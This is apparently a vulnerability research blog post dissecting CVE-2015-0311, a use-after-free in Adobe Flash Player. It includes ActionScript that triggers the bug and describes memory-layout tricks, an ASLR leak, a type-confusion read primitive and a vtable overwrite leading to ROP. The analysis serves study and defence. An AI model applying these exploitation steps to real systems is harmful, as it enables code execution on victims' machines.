Exploiting CVE-2015-0311: A Use-After-Free in Adobe Flash Player

At the end of January, Adobe published the security bulletin APSA15-01 for Flash Player, which fixes a critical use-after-free vulnerability affecting Adobe Flash Player 16.0.0.287 and earlier versions. This vulnerability, identified as CVE-2015-0311, allows attackers to execute arbitrary code on vulnerable machines by enticing unsuspecting users to visit a website serving a specially crafted SWF Flash file. The vulnerability was first discovered as a zero-day being actively exploited in the wild as part of the Angler Exploit Kit. Although the exploit code was highly obfuscated using the SecureSWF obfuscation tool, malware samples taking advantage of this vulnerability became publicly available.

Vulnerability overview

When trying to decompress the data in a ByteArray previously compressed with zlib from ActionScript code, the underlying ActionScript Virtual Machine (AVM) will handle this operation in the ByteArray::UncompressViaZlibVariant method. This method makes use of the ByteArray::Grower class in order to dynamically grow the destination buffer for the decompressed data. After a successful growth of the destination buffer, the destructor of the Grower class will notify all the subscribers of the compressed ByteArray that they must use the newly-grown buffer. One example of a subscriber for a ByteArray is the global ApplicationDomain.currentDomain.domainMemory property, which can be set to hold a global reference to a given ByteArray. The purpose of ApplicationDomain.currentDomain.domainMemory is to provide fast read-and-write operations over the actual data of a ByteArray by using low-level AVM instructions from the avm2.intrinsics.memory package, like li8/si8, li16/si16, li32/si32, etc. A problem arises when the inflate() function of the zlib library fails because the data in the ByteArray is not valid zlib-compressed data. In that case, the ByteArray::UncompressViaZlibVariant() method will do a rollback, by freeing the grown buffer and restoring the original data of the ByteArray. However, it does NOT notify the subscriber (ApplicationDomain.currentDomain.domainMemory) that the grown buffer has been freed, so ApplicationDomain.currentDomain.domainMemory will keep a dangling reference to the freed buffer.

Root cause analysis

Let's dig in the source code of the ActionScript Virtual Machine and see what happens under the hood when we call the uncompress() method of a ByteArray object from ActionScript code. When we try to decompress the data of a ByteArray, the ByteArray::Uncompress() method of the AVM (defined in core/ByteArrayGlue.cpp) will call a decompression function according to the compression algorithm that was used to compress the data. We are going to focus on the zlib case.

 void ByteArray::Uncompress(CompressionAlgorithm algorithm)
  {
  switch (algorithm) {
  case k_lzma:
  UncompressViaLzma();
  break;
  case k_zlib:
  default:
  UncompressViaZlibVariant(algorithm);
  break;
  }

ByteArray::UncompressViaZlibVariant() calls the inflate() function from the zlib library within a loop in order to decompress the ByteArray data in chunks, as shown in the code snippet below:

    void ByteArray::UncompressViaZlibVariant(CompressionAlgorithm algorithm)
     {
             [...]
             while (error == Z_OK)
             {
                 stream.next_out = scratch;
                 stream.avail_out = kScratchSize;
                 error = inflate(&stream, Z_NO_FLUSH);
                 Write(scratch, kScratchSize - stream.avail_out);
             }
 
             inflateEnd(&stream);
  [...]

After calling inflate() from the zlib library, the Write() method of the ByteArray class is called in order to copy the decompressed chunk to the destination buffer:

    void ByteArray::Write(const void* buffer, uint32_t count)
     {
         if (count > UINT32_T_MAX - m_position) // Do not rearrange, guards against 64-bit overflow
             ThrowMemoryError();
 
         uint32_t writeEnd = m_position + count;
         
         Grower grower(this, writeEnd);
         grower.EnsureWritableCapacity();
         
         move_or_copy(m_buffer->array + m_position, buffer, count);
         m_position += count;
         if (m_buffer->length < m_position)
             m_buffer->length = m_position;
     }

As you can see, that method creates an instance of the Grower class and calls its EnsureWritableCapacity() method in order to grow the destination buffer. The scope of this Grower instance is local to the ByteArray::Write() method, so when this method is carried out, the destructor of the Grower class will be implicitly invoked. Here's part of the code of the Grower class destructor. It calls the NotifySubscribers() method of the ByteArray class:

 ByteArray::Grower::~Grower()
  {
  if (m_oldArray != m_owner->m_buffer->array || m_oldLength != m_owner->m_buffer->length)
  {
  m_owner->NotifySubscribers();
  }
  [...]

ByteArray::NotifySubscribers() loops through all the subscribers of the ByteArray, calling their notifyGlobalMemoryChanged() method in order to inform them the address and the size of the newly grown buffer:

 void ByteArray::NotifySubscribers()
  {
  for (uint32_t i = 0, n = m_subscribers.length(); i < n; ++i) { 
  AvmAssert(m_buffer->length >= DomainEnv::GLOBAL_MEMORY_MIN_SIZE);
  
  DomainEnv* subscriber = m_subscribers.get(i);
  if (subscriber)
  {
  subscriber->notifyGlobalMemoryChanged(m_buffer->array, m_buffer->length);
  }
  else
  {
  // Domain went away? remove link
  m_subscribers.removeAt(i);
  --i;
  }
  }
  }

Finally, the DomainEnv::notifyGlobalMemoryChanged() method will update the address and the size of the global memory. This is the method that actually modifies the base address and size of ApplicationDomain.currentDomain.domainMemory:

 // memory changed so go through and update all reference to both the base
  // and the size of the global memory
  void DomainEnv::notifyGlobalMemoryChanged(uint8_t* newBase, uint32_t newSize)
  {
  AvmAssert(newBase != NULL); // real base address
  AvmAssert(newSize >= GLOBAL_MEMORY_MIN_SIZE); // big enough
 
  m_globalMemoryBase = newBase;
  m_globalMemorySize = (newSize > 0x7fffffff) ? 0x7fffffff : newSize;
 TELEMETRY_UINT32(toplevel()->core()->getTelemetry(), ".mem.bytearray.alchemy",m_globalMemorySize/1024);
  }

After all of this call chain, we are back in the "inflate() and Write()" loop within the ByteArray::UncompressViaZlibVariant() method. If one of the calls to inflate() within the loop returns a value different than 0, then the loop is exited, and a check is performed to determine whether the data was fully decompressed. If something went wrong, a rollback is performed: the new buffer is freed by calling TellGcDeleteBufferMemory() / mmfx_delete_array() and the original data of the ByteArray is restored, as shown below:

 [...]
  if (error == Z_STREAM_END)
  {
  // everything is cool
  [...]
  else
  {
  // When we error:
 
  // 1) free the new buffer
  TellGcDeleteBufferMemory(m_buffer->array, m_buffer->capacity);
  mmfx_delete_array(m_buffer->array);
 
  if (cShared) {
  m_buffer = origBuffer;
  }
 
  // 2) put the original data back.
  m_buffer->array = origData;
  m_buffer->length = origLen;
  m_buffer->capacity = origCap;
  m_position = origPos;
  SetCopyOnWriteOwner(origCopyOnWriteOwner);
  origBuffer = NULL; // release ref before throwing
  toplevel()->throwIOError(kCompressedDataError);
  }

But note that no one notifies the subscribers that the new buffer has been freed! So ApplicationDomain.currentDomain.domainMemory will keep a reference to that buffer even after it has been freed because decompression failed. We can later dereference that dangling pointer, so this is a use-after-free vulnerability.

Triggering the Use-After-Free

So we can reproduce this dangling pointer condition by filling a ByteArray with some data, compressing it with zlib, then overwriting the compressed data with junk starting at offset 0x200, then assigning this ByteArray to ApplicationDomain.currentDomain.domainMemory in order to create a subscriber for this ByteArray, and finally calling the uncompress() method on our ByteArray. But why are we overwriting the compressed data starting at offset 0x200? Well, leaving some valid compressed data at the beginning of the ByteArray will make the first call to inflate() successful; this way the ByteArray::Write() method will create an instance of the Grower class, which will grow the destination buffer for the decompressed data and notify the subscribers to use this new-grown buffer. In the second iteration of the "inflate() and Write()" loop the inflate() function will try to decompress junk data, thus failing. So ByteArray::UncompressViaZlibVariant() will perform the rollback, freeing the new buffer without notifying the subscribers of the ByteArray, hence leaving a dangling pointer. The following ActionScript code snippet reproduces the vulnerability, leaving ApplicationDomain.currentDomain.domainMemory referencing a freed buffer:

 this.byte_array = new ByteArray();
  this.byte_array.endian = Endian.LITTLE_ENDIAN;
  this.byte_array.position = 0;
 
  /* Initialize the ByteArray with some data */
  while (count < 0x2000 / 4){
  this.byte_array.writeUnsignedInt(0xfeedface + count);
  count++;
  }
 
  /* Compress it with zlib */
  this.byte_array.compress();
 
  /* Overwrite the compressed data with junk, starting at offset 0x200 */
  this.byte_array.position = 0x200;
  while (pos < byte_array.length){
  this.byte_array.writeByte(pos);
  pos++;
  }
 
  /* Create a subscriber for that ByteArray */
  ApplicationDomain.currentDomain.domainMemory = this.byte_array;
 
  /* Trigger the bug! ByteArray::UncompressViaZlibVariant will leave ApplicationDomain.currentDomain.domainMemory
  pointing to a buffer that is freed when the decompression fails. */
  try{
  this.byte_array.uncompress();
  } catch(error:Error){
  }

So at this point we have ApplicationDomain.currentDomain.domainMemory referencing freed memory. ApplicationDomain.currentDomain.domainMemory has type ByteArray. If we try to use its high-level methods, they seem to operate on the legitimate ByteArray with the corrupted compressed data. Let's go back to the source code of the ActionScript Virtual Machine and recall how the DomainEnv::notifyGlobalMemoryChanged() method updates the address and the size of the global memory:

 m_globalMemoryBase = newBase;
  m_globalMemorySize = (newSize > 0x7fffffff) ? 0x7fffffff : newSize;

m_globalMemoryBase (the dangling pointer itself) and m_globalMemorySize are members of the DomainEnv class (core/DomainEnv.h). These members are accessed through these getter methods:

 REALLY_INLINE uint8_t* globalMemoryBase() const { return m_globalMemoryBase; }
  REALLY_INLINE uint32_t globalMemorySize() const { return m_globalMemorySize; }

If we look for references to these getter methods in the AVM source code, we find them in the core/Interpreter.cpp file:

 #define MOPS_LOAD_INT(addr, type, call, result) \
  MOPS_RANGE_CHECK(addr, type) \
  union { const uint8_t* p8; const type* p; }; \
  p8 = envDomain->globalMemoryBase() + (addr); \
  result = *p;
 
  #define MOPS_STORE_INT(addr, type, call, value) \
  MOPS_RANGE_CHECK(addr, type) \
  union { uint8_t* p8; type* p; }; \
  p8 = envDomain->globalMemoryBase() + (addr); \
  *p = (type)(value);

And those macros are used in the same core/Interpreter.cpp file:

 INSTR(li32) {
  i1 = AvmCore::integer(sp[0]); // i1 = addr
  MOPS_LOAD_INT(i1, int32_t, li32, i32l); // i32l = result
  sp[0] = core->intToAtom(i32l);
  NEXT;
  }
  [...]
  INSTR(si32) {
  i32l = AvmCore::integer(sp[-1]); // i32l = value
  i1 = AvmCore::integer(sp[0]); // i1 = addr
  MOPS_STORE_INT(i1, uint32_t, si32, i32l);
  sp -= 2;
  NEXT;
  }

So that's it! In order to dereference the dangling pointer we need to use the low-level AVM instructions from the avm2.intrinsics.memory package, like li8/si8, li16/si16, li32/si32, etc. These instructions, in conjunction with ApplicationDomain.currentDomain.domainMemory, provide fast read-and-write operations over the underlying raw buffer that contains the actual data of a ByteArray, skipping the overhead of using the high-level methods of the ByteArray class. The li8/si8, li16/si16, li32/si32 instructions operate implicitly on ApplicationDomain.currentDomain.domainMemory, as shown in the ActionScript snippet below:

 /* Read a 32-bit integer from m_globalMemoryBase + 0x20 */
  var some_value:uint = li32(0x20);
 
  /* Overwrite the 32-bit integer at m_globalMemoryBase + 0x20 with 0xffffffff */
  si32(0xffffffff, 0x20);

Exploitation

In order to exploit this vulnerability, once you are debugging a vulnerable version of the Adobe Flash Player within your web browser, you may want to put a breakpoint at the beginning of the "inflate() and Write()" loop:

The first time the breakpoint is hit, follow the call to ByteArray::Write() all the way down to the DomainEnv::notifyGlobalMemoryChanged() method, in order to watch how ApplicationDomain.currentDomain.domainMemory is updated. This is the said method in the Flash OCX binary file:

[EDX + 0x14] will hold the address of the new buffer, while [EDX + 0x18] will hold the size of the new buffer. In my testing environment I've got ApplicationDomain.currentDomain.domainMemory updated like this: the buffer address will be 0x0a98c000, while the buffer length will be 0x1c32.

The next call to inflate() will fail with error code 0xfffffffb, so execution flow goes to the routine that performs the rollback (the one named cleanup_on_uncompress_error here):

Stepping into this function we can see how it frees the buffer by calling TellGcDeleteBufferMemory() on it:

Note that the arguments for TellGcDeleteBufferMemory() are 0x0a98c000 (buffer address) and 0x200f. 0x200f is the buffer capacity here, which is different from the buffer length (0x1C32, as shown in a screenshot above). From the core/ByteArrayGlue.h file:

        class Buffer : public FixedHeapRCObject
        {
        public:
            virtual void destroy();
            virtual ~Buffer();
            uint8_t* array;
            uint32_t capacity;
            uint32_t length;
        };

Buffer.capacity is the maximum number of bytes that a Buffer can hold (0x200f in this case), while Buffer.length is the number of bytes actually used (0x1C32), hence the difference. Right after calling TellGcDeleteBufferMemory() it calls mmfx_delete_array() to finish freeing the buffer.

So now that the buffer is freed, we want to allocate some interesting object in the memory "hole" left by that buffer. I did it by following the same method used in the malware sample, that is, creating a new placeholder ByteArray with size 0x2000, then freeing it by calling its clear() method, and finally creating a Vector.<Object>(510 * 3) object. That means that at this point we have ApplicationDomain.currentDomain.domainMemory (which should be referencing the raw buffer that contains the actual data of a ByteArray) pointing to the very beginning of a Vector object! Since we can perform read-and-write operations on the memory pointed by ApplicationDomain.currentDomain.domainMemory by using AVM instructions like li32/si32, we can read and modify the Vector object at will, including its metadata! The following diagram illustrates the expected state versus the actual state after triggering the bug and allocating a Vector object in the memory hole left by the freed buffer:

Tampering with the Vector

The memory layout of the Vector object looks like this:

$ ==> <Vector>                  00010C00
$+4                             00001FE0
$+8                             08238000
$+C                             082FA248
$+10                            0793C000
$+14                            09B8E018    <pointer to the_vector + 0x18 - useful if you need to obtain the address of the_vector>
$+18                            00000010
$+1C                            00000000
$+20 .vtable                    61199418    OFFSET <Flash32_.Vector_vtable>  -> Overwrite it to hijack the execution flow
$+24 .length                    000005FA    -> Overwrite it with 0xffffffff so you can read/write from/to any memory address
$+28 .elements[]                07A86BA1    the_vector[0]    
$+2C                            07A86BA1    the_vector[1]
$+30                            07A86BA1    the_vector[2] 
...                             xxxxxxxx    the_vector[n]

By doing li32(0x20) we can read the dword stored at offset 0x20 of the Vector object, which is its vtable; having read the address of the vtable is enough to determine the base address of the Flash module, allowing us to bypass ASLR. By doing si32(0xffffffff, 0x24) we can overwrite the dword stored at offset 0x24 of the Vector object, which is its length. Setting this new length will allow us to read/write from/to any memory address within the address space of the browser process, if needed at all. I didn't need to modify the Vector length in order to exploit this vulnerability on Windows 7 SP1. Then we build our ROP chain as a ByteArray, and we store it as the first element of the Vector (no metadata is overwritten here). This ByteArray object with out ROP chain is stored as a tagged pointer. But what's a tagged pointer? Flash adds information about object pointers in the 3 least significative bits, as described below (taken from Haifei Li's presentation from CanSecWest 2011).

    Untagged    = 000 (0)
    Object      = 001 (1)
    String      = 010 (2)
    Namespace   = 011 (3)
    "undefined" = 100 (4)
    Boolean     = 101 (5)
    Integer     = 110 (6)
    Number      = 111 (7)

So now we can leak the address of our ROP chain ByteArray object by doing li32(0x28) -- that is, doing a raw read of the first element of the Vector -- and then untagging it by cleaning its 3 least significative bits by doing a "address & 0xfffffff8" bitwise operation. Having leaked the pointer to the ROP chain ByteArray object, we want to read the dword stored at offset 0x40 of the ByteArray object, which is a pointer to a ByteArray::Buffer object. This is the memory layout of a ByteArray object for reference:

$ ==> <ByteArray>               71078F10  OFFSET <Flash32_.ByteArray_vtable>
$+4                             00000002
$+8                             069CFDD0
$+C                             0697E628
$+10                            06831360
$+14                            00000040
$+18                            71078EB8  Flash32_.71078EB8
$+1C                            71078EC0  Flash32_.71078EC0
$+20                            71078EB4  Flash32_.71078EB4
$+24                            710BD534  Flash32_.710BD534
$+28                            06603080
$+2C                            06432000
$+30                            0688EFB8
$+34                            00000000
$+38                            00000000
$+3C                            7108ACC8  Flash32_.7108ACC8
$+40                            0686D5D8  <pointer to ByteArray::Buffer>
$+44                            00000000

In order to read the dword stored at offset 0x40 of the ByteArray object I decided to use a technique explained by Nicolas Joly from Vupen, which consists of modifying (tagging) a pointer so it is interpreted as a pointer to a Number (IEEE-754 double precision) object, thus creating a type confusion that will provide us with a primitive to read 8 bytes from an arbitrary address. First we tag the address we want to read from as a pointer to a Number object (OR'ing the address with 7 - see the tags table above). That's how we create the confusion. Then we store this fake pointer-to-Number-object in the elements[] array of the Vector by doing si32(fake_number_object, 0x2C). After that we grab that fake Number object (this.the_vector[1] in the code below) and write it to an auxiliary ByteArray; this way the 8 bytes stored at the arbitrary address we want to read from are stored in the auxiliary ByteArray.

            obj = this.the_vector[1];
            z = new Number(obj);

            var b:ByteArray = new ByteArray();
            b.endian = Endian.LITTLE_ENDIAN;
            b.writeDouble(z);

            /* If pointer is aligned to 8, then we read the first dword */
            if ((pointer & 7) == 0){
                result = b[3]*0x1000000 + b[2]*0x10000 + b[1]*0x100 + b[0];
            }
            /* else we read the second dword */
            else{
                result = b[7]*0x1000000 + b[6]*0x10000 + b[5]*0x100 + b[4];
            }
            return result;

We use this primitive in order to read the dword stored at offset 0x40 of the ByteArray object, which is a pointer to a ByteArray::Buffer object as I have mentioned before, and then we use the read primitive once more in order to read the dword stored at offset 0x8 of the ByteArray::Buffer object, which is a pointer to the raw data of our ROP chain ByteArray. Here you have the memory layout of a ByteArray::Buffer object for reference:

$==> <Buffer>                 63D1945C  OFFSET <Flash32_.Buffer_vtable>
$+4                           00000003
$+8  .array                   06BC5000  <pointer to the raw data of the ByteArray>
$+C  .capacity                0000200F
$+10 .length                  00001C32

This way we have obtained the address of our ROP chain (0x06BC5000 in this example); now we just need to overwrite the vtable of the Vector object with the address of our ROP chain by doing si32(address_of_rop_chain, 0x20), and then call the toString() method of the Vector object, so the overwritten vtable is dereferenced to call a function pointer, thus hijacking the execution flow in order to start our ROP and ultimately execute arbitrary code:

    new Number(this.the_vector.toString());

Conclusion

The use-after-free vulnerability analyzed in this post can be leveraged to read and modify arbitrary memory in the address space of the browser process, allowing the attacker to bypass protections provided by the operating system like ASLR and DEP, ultimately leading to the execution of arbitrary code. However, you should note that the exploitation process described in this blog post applies to Windows 7 SP1, but it will not work on Windows 8.1 Update 3 (released November 2014). Why is that? Well, in Windows 8.1 Update 3 Microsoft introduced a new exploit mitigation technology called Control Flow Guard (CFG). CFG injects a check before every indirect call in the code in order to verify if the destination address of that call is one of the locations identified as "safe" at compile time. If that check fails at runtime, the program detects an attempt to subvert the normal execution flow and exits immediately. It turns out that the Flash version that is integrated into Windows 8.1 Update 3 is compiled with Control Flow Guard enabled, so in the last exploitation step, that is when we overwrite the Vector vtable and call the toString() method of the Vector object in order to modify the execution flow, the CFG check function will detect our fake vtable and finish the process immediately, thus preventing our exploitation attempt.

That means that exploitation of this Flash vulnerability on Windows 8.1 Update 3 targets introduces a new hurdle: bypassing the CFG protection. Spoiler alert: we did managed to bypass CFG in order to successfully exploit this Flash vulnerability on Windows 8.1 Update 3. So stay tuned for a new blog post with a detailed explanation of how we did it!